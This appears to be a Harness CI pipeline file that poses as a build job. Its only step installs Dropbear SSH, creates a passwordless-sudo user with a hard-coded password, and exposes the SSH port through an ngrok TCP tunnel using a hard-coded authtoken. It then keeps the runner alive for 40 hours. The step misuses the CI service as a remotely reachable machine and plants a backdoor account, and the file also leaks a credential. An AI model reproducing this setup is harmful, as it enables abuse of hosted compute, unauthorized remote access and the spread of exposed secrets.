pipeline:
  identifier: Build_Subhya090_binaryudp_1741606998488
  name: Build binaryudp
  orgIdentifier: default
  projectIdentifier: default_project
  properties:
    ci:
      codebase:
        build: <+input>
        connectorRef: account.Github_OAuth_1741606939087
        repoName: Subhya090/binaryudp
  stages:
    - stage:
        identifier: build
        name: build
        spec:
          caching:
            enabled: true
          cloneCodebase: false
          execution:
            steps:
              - step:
                  identifier: setup_dropbear_ngrok
                  name: Setup Dropbear SSH  Ngrok
                  type: Run
                  spec:
                    shell: Bash
                    command: |
                      echo "🔹 Updating system and installing Dropbear SSH..."
                      apt-get update && apt-get install -y dropbear wget unzip curl

                      echo "🔹 Creating SSH user 'samir' with password 'samir090'..."
                      useradd -m -s /bin/bash -G sudo samir
                      echo 'samir ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
                      echo 'samir:samir090' | chpasswd

                      echo "🔹 Configuring Dropbear to run on port 3434..."
                      echo "DROPBEAR_EXTRA_ARGS='-p 3434'" > /etc/default/dropbear
                      service dropbear restart

                      echo "🔹 Checking if Dropbear is running..."
                      netstat -tlnp | grep 3434 || { echo "❌ Dropbear failed to start!"; exit 1; }

                      echo "🔹 Downloading & installing latest Ngrok (v3)..."
                      curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null
                      echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | tee /etc/apt/sources.list.d/ngrok.list
                      apt update && apt install ngrok -y

                      echo "🔹 Authenticating Ngrok..."
                      ngrok config add-authtoken 2lKjA15AAL3kFG0cbOpfTJGbewT_3PjMCSs55KCHQ2PKkoVdS

                      echo "🔹 Starting Ngrok (foreground run for debugging)..."
                      ngrok tcp 3434 &

                      echo "🔹 Waiting for Ngrok to establish tunnel..."
                      sleep 10

                      echo "🔹 Checking if Ngrok is running..."
                      pgrep -x ngrok || { echo "❌ Ngrok failed to start! Retrying..."; ngrok tcp 3434 & sleep 5; }



                      echo "🔹 Keeping build alive for 40 hours..."
                      sleep 144000
          platform:
            arch: Amd64
            os: Linux
          runtime:
            spec: {}
            size: xlarge
            type: Cloud
        type: CI
  timeout: 53w
